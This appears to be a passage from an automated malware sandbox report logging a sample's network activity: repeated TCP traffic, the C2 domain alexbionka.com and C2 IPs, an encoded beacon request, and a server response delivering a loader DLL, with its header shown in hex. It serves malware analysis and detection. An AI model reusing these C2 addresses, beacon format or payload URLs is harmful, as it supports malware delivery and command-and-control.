      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
      Source: global trafficTCP traffic: 64.227.108.27:80 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
      Source: global trafficTCP traffic: 64.227.108.27:80 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 64.227.108.27:80 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 64.227.108.27 80Jump to behavior
      Source: C:\Windows\System32\rundll32.exeDomain query: alexbionka.com
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: alexbionka.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3570055661:1:5038:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:30423335313032443133344136373743; __io=0; _gid=67AFEDC5AC03Host: alexbionka.com
      Source: Joe Sandbox ViewIP Address: 64.227.108.27 64.227.108.27
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 11 Aug 2022 15:27:53 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34X-Powered-By: PHP/7.2.34Content-Description: File TransferContent-Disposition: attachment; filename="loader_p3_dll_64_n3_crypt_x64_asm_clone_n152.dll"Expires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 360448Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 55 ef 34 c3 11 8e 5a 90 11 8e 5a 90 11 8e 5a 90 02 e9 59 91 10 8e 5a 90 59 e0 5a 91 10 8e 5a 90 33 e6 a5 90 10 8e 5a 90 6a e1 58 91 10 8e 5a 90 52 69 63 68 11 8e 5a 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 59 d1 f4 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 12 0e 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 07 00 0c 00 06 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 91 9d 05 00 03 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 90 05 00 7d 01 00 00 00 00 00 00 00 00 00 00 00 a0 05 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 77 05 00 00 10 00 00 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7d 01 00 00 00 90 05 00 00 02 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 a0 05 00 00 02 00 00 00 7e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: global trafficHTTP traffic detected: GET /fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.8.146.139Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Aug 2022 15:28:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 30 63 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 6c 65 78 62 69 6f 6e 6b 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
      Source: rundll32.exe, 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146
      Source: r8F8A.tmp.exe, 00000004.00000002.947212998.0000000000544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO651
      Source: rundll32.exe, 00000005.00000002.946500904.0000000000134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
      Source: r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm&
      Source: rundll32.exe, 00000005.00000002.946524016.0000000000420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm516F-U91Z1DJNJ2U9D-823/rm3/rm3/rm
      Source: r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmT&
      Source: r8F8A.tmp.exe, 00000004.00000002.947204650.0000000000520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rma
      Source: r8F8A.tmp.exe, 00000004.00000002.947197812.0000000000360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmj
      Source: r8F8A.tmp.exe, 00000004.00000002.947204650.0000000000520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmli
      Source: r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmv&
